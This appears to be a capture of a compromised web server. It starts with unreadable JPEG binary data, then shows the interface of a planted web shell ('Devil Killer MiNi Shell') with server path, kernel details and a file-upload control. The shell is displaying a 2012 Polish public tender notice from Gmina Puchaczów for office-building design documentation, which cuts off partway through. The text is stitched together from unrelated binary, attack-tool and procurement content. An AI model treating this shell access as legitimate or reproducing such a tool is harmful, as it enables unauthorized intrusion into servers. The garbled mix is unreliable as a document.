JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120102/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120102/857-N-2012.html

<p class="kh_header"><b>Puchaczów: Opracowanie kompleksowej dokumentacji projektowej na budowę siedziby Urzędu Gminy w Puchaczowie w oparciu  o opracowaną ogólną koncepcję  wraz z uzyskaniem pozwolenia na budowę</b><br>
<b>Numer ogłoszenia: 857 - 2012; data zamieszczenia: 02.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Puchaczów , ul. Lubelska 22, 21-013 Puchaczów, woj. lubelskie, tel. 081 7575780, faks 081 7575765.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.puchaczow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie kompleksowej dokumentacji projektowej na budowę siedziby Urzędu Gminy w Puchaczowie w oparciu  o opracowaną ogólną koncepcję  wraz z uzyskaniem pozwolenia na budowę.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Przedmiotem zamówienia jest usługa polegająca na opracowaniu kompleksowej dokumentacji projektowej na budowę siedziby Urzędu Gminy w Puchaczowie w oparciu  o opracowaną ogólną koncepcję wraz z uzyskaniem pozwolenia na budowę.
Etapy opracowania:
Etap I - koncepcja programowo - przestrzenna
Etap II - wielobranżowa kompleksowa dokumentacja projektowa. Projekty rozbiórki istniejących obiektów tj. obecnej siedziby Urzędu Gminy i pawilonów handlowych.
Zamawiający wymaga, aby oferta obejmowała całość przedmiotu zamówienia łącznie z uzyskaniem pozwolenia na budowę i pozwoleń na rozbiórkę.
Zaleca się, aby Wykonawcy dokonali wizji lokalnej na terenie projektowanej inwestycji i w jej okolicy w celu dokonania weryfikacji dokumentów i informacji przekazywanych w ramach niniejszego postępowania przez Zamawiającego.

1. Przy opracowaniu projektu należy uwzględnić:
1. Opracowaną koncepcję na budowę nowej siedziby Urzędu Gminy w Puchaczowie.
2. Przebudowę kolizji z istniejącym uzbrojeniem nad i podziemnym.
3. Opracować analizę kosztów ogrzewania budynku w wersjach:
a) gazową,
b) olejem opałowym,
c) pompą ciepła,
Powyższe należy wykonać na etapie koncepcji programowo - przestrzennej- etap I.

2. Zamawiający dopuszcza wykonanie przedmiotu zamówienia przy udziale podwykonawców. Zamawiający wymaga wskazania przez Wykonawcę w ofercie w Formularzu oferty zakresu zamówienia prac projektowych, których wykonanie Wykonawca powierzy Podwykonawcom(jeśli dotyczy). 
3. Zamawiający wymaga udzielenia przez Wykonawcę gwarancji na przedmiot zamówienia na okres minimum 36 miesięcy. Bieg okresu gwarancji rozpoczyna się w dniu następnym licząc od daty odbioru ostatecznego opracowania. Okres rękojmi według zapisów §11 umowy.
Specyfikacja istotnych warunków zamówienia SIWZ znajduje się w siedzibie zamawiającego oraz na stronie internetowej: www.puchaczow.pl

II. Wielkość lub zakres zamówienia.
1. Zakres opracowań obejmuje dla każdej branży: architektonicznej, budowlanej, energetycznej, sanitarnej, drogowej, telefonicznej i teleinformatycznej:
a)	uzyskanie map do celów projektowych w wersji numerycznej - pozyskanie map leży po stronie Wykonawcy,
b)	projekt budowlany budynku wraz z projektem zagospodarowania terenu - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej, 
c)	projekt wykonawczy - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej, 
d)	projekt aranżacji wnętrz - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
e)	projekt zegara oraz wiatrowskaz- 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
f)	Projekt sieci telefonicznej z przyłączem- 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
g)	Projekt sieci teleinformatycznej i internetu - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
h)	Projekty zabezpieczenia od włamania i kradzieży oraz sygnalizacji p. pożarowej, wraz z centralą sygnalizacji pożaru - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
i)	Projekt zieleni wraz z inwentaryzacją dendrologiczną- 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
j)	Zestaw wyposażenia biurowego i komputerowego oraz dla baru szybkiej obsługi wraz z kosztami zakupu - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
k)	przedmiary robót - 3 egz. w wersji papierowej i 1 egz. w edytowalnej wersji elektronicznej dla każdej branży, 
l)	kosztorys inwestorski - 2 egz. w wersji papierowej i 1 egz. w edytowalnej wersji elektronicznej dla każdej branży,
m)	kosztorys ofertowy - 2 egz. w wersji papierowej i 1 egz. w edytowalnej wersji elektronicznej dla każdej branży, 
n)	projekty wykonawcze  - po 6 egz.  na rozbiórkę istniejących obiektów wraz z przedmiarami robót i kosztorysami inwestorskimi. 
o)	Projekt oświetlenia terenu i iluminacji świetlnej budynku. - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
p)	Projekt wentylacji  i klimatyzacji - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
q)	Projekt budowlany  i wykonawczy dźwigu osobowego wraz z zasilaniem- 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej,
r)	Projekt instalacji odgromowej - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
s)	Projekt instalacji telewizji przemysłowej- 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
t)	Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych  (SST) - 2 egz. i 1 egz.  w wersji elektronicznej dla każdej branży,
u)	projekt stałej zatwierdzonej organizacji ruchu - 2 egz., - pozyskanie map leży po stronie Wykonawcy,
v)	projekt czasowej zatwierdzonej organizacji ruchu na czas prowadzonych robót - 2 egz. - pozyskanie map leży po stronie Wykonawcy,
w)	materiały do uzyskania decyzji o środowiskowych uwarunkowaniach, w tym kartę informacyjną przedsięwzięcia, przygotowaną zgodnie z art. 3 ust. 1 pkt 5 ustawy
o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko, w związku z ustawą Prawo ochrony środowiska,
x)	raport oddziaływania przedsięwzięcia na środowisko w przypadku nałożenia przez właściwy organ obowiązku jego sporządzenia,
y)	uzyskanie prawomocnej decyzji o środowiskowych uwarunkowaniach realizacji przedsięwzięcia, w tym w szczególności, występowanie do właściwych organów o wydanie opinii, uzgodnień i postanowień, sporządzenie dokumentów wynikających z uzyskanych opinii, uzgodnień i postanowień,
z)	uzyskanie warunków technicznych przebudowy i  przyłączenia niezbędnych mediów, odprowadzenia wód deszczowych, itp.,
aa)	opracowanie projektów budowlanych wszystkich branż - o szczegółowości zgodnej  z rozporządzeniem Ministra Infrastruktury w sprawie szczegółowego zakresu i formy projektu budowlanego,
bb)	badania geotechniczne podłoża gruntowego - dostarczy zamawiający w dniu podpisania umowy.  
cc)	wykonanie wszelkich niezbędnych opracowań, których konieczność wyniknie w toku prac projektowych, 
dd)	przygotowanie wniosku wraz  z załącznikami o wydanie decyzji pozwolenia na budowę
ee)	uzyskanie w imieniu i na rzecz Gminy Puchaczów (na podst. pełnomocnictwa udzielonego przez Zamawiającego), decyzji o pozwoleniu na budowę w oparciu o przygotowane przez Wykonawcę materiały, 
ff)	Ze względu na położenie obiektu w strefie ochrony konserwatorskiej - uzyskanie wytycznych konserwatorskich na etapie opracowania KPP,
gg)	sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia ze względu na specyfikę projektowanego obiektu budowlanego - uwzględnianej w planie bezpieczeństwa   i ochrony zdrowia ze wskazaniem w szczególności, czy zakres robót obejmuje jeden z rodzajów wymienionych w art. 21a ust.2 ustawy Prawo Budowlane; informacja winna uwzględniać warunki rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 roku w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa
i ochrony zdrowia.
hh)	W KPP oraz PB i PW wykonawca dokumentacji projektowej przewidzi możliwość realizacji obiektu w takim zakresie rzeczowym, aby rozbiórka istniejącego budynku Urzędu Gminy, nastąpiła po wykonaniu nowego obiektu w takim zakresie rzeczowym aby można było przenieść do niego Urząd Gminy. Udostępniono przez Zamawiającego opracowaną Koncepcję nowej siedziby Urzędu należy traktować jako ogólne wytyczne z dopuszczeniem zmiany lokalizacji,  przeznaczenia pomieszczeń w uzgodnieniu z Zamawiającym na etapie opracowania KPP. W trakcie opracowania  KPP wykonawca na bieżąco będzie konsultował z Zamawiającym proponowane rozwiązania i uzyskiwał jego akceptację na poszczególne elementy, przed ostatecznym opracowaniem KPP. Uzgodnienia będą się odbywać w siedzibie Zamawiającego z udziałem projektantów, obowiązują pisemne uzgodnienia i aktualizacja przedkładanych elementów opracowania.
ii)	Do ogrzania ciepłej wody użytkowej i wspomagania c.o. należy zaprojektować baterie słoneczne (solary) wraz z instalacją.

2. Projekty budowlane powinny być opracowany zgodnie z: 
a)	ustaleniami określonymi w decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, o której mowa w ustawie z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko
b)	wymaganiami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (j.t. Dz. U. z 2010 r.
Nr 243, poz. 1623 z późniejszymi zmianami), 
c)	Ustawą z dnia 2003.03.27 o planowaniu i zagospodarowaniu przestrzennym wraz z późniejszymi zmianami.
d)	Rozporządzenie Ministra Infrastruktury z dnia 2002.04.12 w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowania, wraz z późniejszymi zmianami.
e)	Rozporządzenie Ministra Infrastruktury z 2003.07.03 w sprawie szczegółowego zakresu i formy projektu budowlanego wraz z późniejszymi zmianami.
f)	Ustawą z dnia 2004.01.29 Prawo zamówień publicznych wraz z późniejszymi zmianami.
g)	Rozporządzenie Ministra Infrastruktury z dnia 2004.09.02 w sprawie szczegółowego zakresu i formy dokumentacji projektowej, STWiORB oraz PFU wraz z późniejszymi zmianami
h)	Rozporządzenie Ministra Infrastruktury w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego obliczenia planowanych kosztów prac projektowych oraz planowania kosztów robót budowlanych określonych w PFU.
i)	Innych obowiązujących przepisów prawa.
j)	przepisami oraz zasadami wiedzy technicznej z uwzględnieniem wydania nowych lub zmian dotychczas obowiązujących przepisów.

3. Wymagania dotyczące formy projektów wykonawczych przyjmuje się odpowiednio jak dla projektu budowlanego. 
	Przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem lub wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych. 
	Zamawiający nie dopuszcza opisywania przedmiotu zamówienia przez wskazanie znaków towarowych, patentów lub pochodzenia, chyba, że jest to uzasadnione specyfiką robót budowlanych, dostaw lub usług i nie można opisać ich za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu towarzyszą wyrazy lub równoważny (art. 29 ust. 3 ustawy - Prawo zamówień publicznych). W takich przypadkach należy podać w opisie technicznym warunki równoważności.
	Przedmiot zamówienia objęty niniejszym postępowaniem powinien być opisany za pomocą cech technicznych i jakościowych, z zachowaniem Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy.
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy uwzględnia się 
w kolejności: 
1)  europejskie aprobaty techniczne; 
2) wspólne specyfikacje techniczne;
3)  normy międzynarodowe; 
4) inne techniczne systemy odniesienia ustanowione przez europejskie organy normalizacyjne. 
W przypadku braku Polskich Norm przenoszących normy europejskie lub norm innych państw członkowskich Europejskiego Obszaru Gospodarczego przenoszących te normy oraz aprobat, specyfikacji, norm i systemów uwzględnia się w kolejności: 
1)  Polskie Normy;
2)  polskie aprobaty techniczne; 
3)  polskie specyfikacje techniczne.
4. Wymagania dotyczące opracowania dokumentacji projektowej.
Dokumentacja projektowa:
-  winna być opracowana zgodnie z obowiązującymi przepisami,
- winna spełniać wymogi określone w opisie przedmiotu zamówienia oraz w przepisach prawnych, normach, normatywach, katalogach, wytycznych i innych niezbędnych przy realizacji zamówienia, obowiązujących w dniu przekazania dokumentacji Zamawiającemu,
- musi zawierać - Oświadczenie projektanta i sprawdzającego, wg Prawa Budowlanego art. 20 ust.4..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamień publicznych stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wymagane w kwocie:  7.000,00  PLN. 
1. Formy wniesienia wadium zgodnie z art. 45 ust. 6 ustawy Pzp. Wadium wnoszone w pieniądzu należy wpłacać przelewem z konta Wykonawcy na konto Zamawiającego  na rachunek bankowy
nr: 80 8693 0006 0000 0172 2006 0015 . Wadium należy wnieść (wpływ na konto Zamawiającego) przed upływem terminu składania ofert.
Wadium uważa się za wniesione w terminie, jeżeli kwota wadium znajdzie się na rachunku bankowym Zamawiającego (ZDP) przed upływem terminu składania ofert. Wadium musi być wniesione i obejmować cały okres związania ofertą.
Wadium wnoszone w formie innej niż pieniądz, Wykonawca wnosi na rzecz Zamawiającego - Gminy Puchaczów ul. Lubelska 22, 21-013 Puchaczów.
Wykonawca, który nie wniesie wadium w określonym terminie, zostanie wykluczony
z postępowania na podst. art. 24 ust. 2 pkt. 2. ustawy Pzp.
2. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy; 
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
3. Wadium wnoszone w innych dopuszczalnych przez PZP formach niż pieniądz należy złożyć w oryginale dołączając do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania: 
- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia:
Doświadczenie
- Wykonawca musi wykazać się doświadczeniem, w wykonaniu (zakończeniu) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, poprzez wykazanie co najmniej 
1 usługi (Zał. Nr1) polegającej na zaprojektowaniu kompleksowym 1 budynku 
biurowego lub konferencyjnego z podaniem wartości usługi, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentu potwierdzającego, że usługa została wykonana należycie. 
Powierzchnia całkowita budynku nie może być mniejsza niż 1300 m2, a kubatura budynku nie mniejsza niż 4000 m3.
1)  Warunek pkt.VIII.1.b) uznawać się będzie za spełniony, jeżeli Wykonawca wykaże w Załączniku nr1, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał (zakończył) co najmniej 1 usługę opisaną w punkcie VIII.1.b.);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Potencjał techniczny
- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potencjał kadrowy
- Wykonawca musi wykazać osoby (Zał. Nr 2), które będą uczestniczyć w wykonywaniu zamówienia, legitymujące się kwalifikacjami zawodowymi odpowiednimi do funkcji, jakie zostaną im powierzone wraz z informacjami  na temat kwalifikacji zawodowych , doświadczenia, wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności  oraz informacją  o podstawie do dysponowania tymi osobami. Wykonawca na funkcje wymienioną poniżej, wskaże osobę, która spełnia następujące wymagania:  
1) projektant branży architektonicznej - 1 osoba - wymagane jest posiadanie uprawnień projektowych branży architektonicznej - bez ograniczeń,
2) projektant branży konstrukcyjnej - 1 osoba - wymagane jest posiadanie uprawnień w branży konstrukcyjnej- bez ograniczeń,
3) projektant branży drogowej - 1 osoba - wymagane jest posiadanie uprawnień projektowych branży drogowej,
4) projektant branży elektrycznej i elektroenergetycznej - 1 osoba - wymagane jest posiadanie wymaganych ustawowo uprawnień projektowych branży elektroenergetycznej w zakresie sieci i instalacji,
5) projektant branży wodno-kanalizacyjnej oraz c.o.  - 1 osoba - wymagane jest posiadanie wymaganych ustawowo uprawnień projektowych branży sanitarnej w zakresie sieci i instalacji,
6) projektant branży telekomunikacyjnej i teleinformatycznej  - 1 osoba - wymagane jest posiadanie wymaganych ustawowo uprawnień projektowych branży telekomunikacyjnej,
7) projektant branży gazowej - 1 osoba - wymagane jest posiadanie wymaganych ustawowo uprawnień projektowych branży gazowej w zakresie sieci i instalacji,
8) projektant aranżacji wnętrz - 1 osoba,
9) projektant branży zieleni - 1 osoba.

2) Warunek pkt.VIII.1.c) siwz uznawać się będzie za spełniony, jeżeli Wykonawca wykaże w Załączniku nr 2, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonywania zamówienia, a także zakresu wykonywanych przez nich czynności, oraz informacji o podstawie do dysponowania tymi osobami, posiadającymi odpowiednie uprawnienia projektowe lub inne odpowiednie uprawnienia, pozwalające na wykonanie przedmiotowego zamówienia. Ponadto Wykonawca złoży oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Dotyczy osób wymienionych w pkt. VIII.1.c. siwz - potencjał kadrowy

Ponadto, jeżeli Wykonawca wykazując spełnianie warunku pkt. VIII.1.b), c) siwz, polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków, a podmioty te będą brały udział w realizacji części zamówienia wówczas w/w warunki uznawać się będzie za spełnione, po udowodnieniu dodatkowo, iż Wykonawca będzie dysponował powyższymi zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia (art. 26 ust. 2b ustawy Pzp). Nie wykazanie przez Wykonawców spełniania warunków udziału w postępowaniu tj. brak dokumentów, brak oświadczenia co najmniej jednego z warunków udziału w postępowaniu, będzie skutkowało wykluczeniem wykonawcy z postępowania na podstawie art. 24 ust. 2 pkt. 4 ustawy Pzp, z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej
- Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

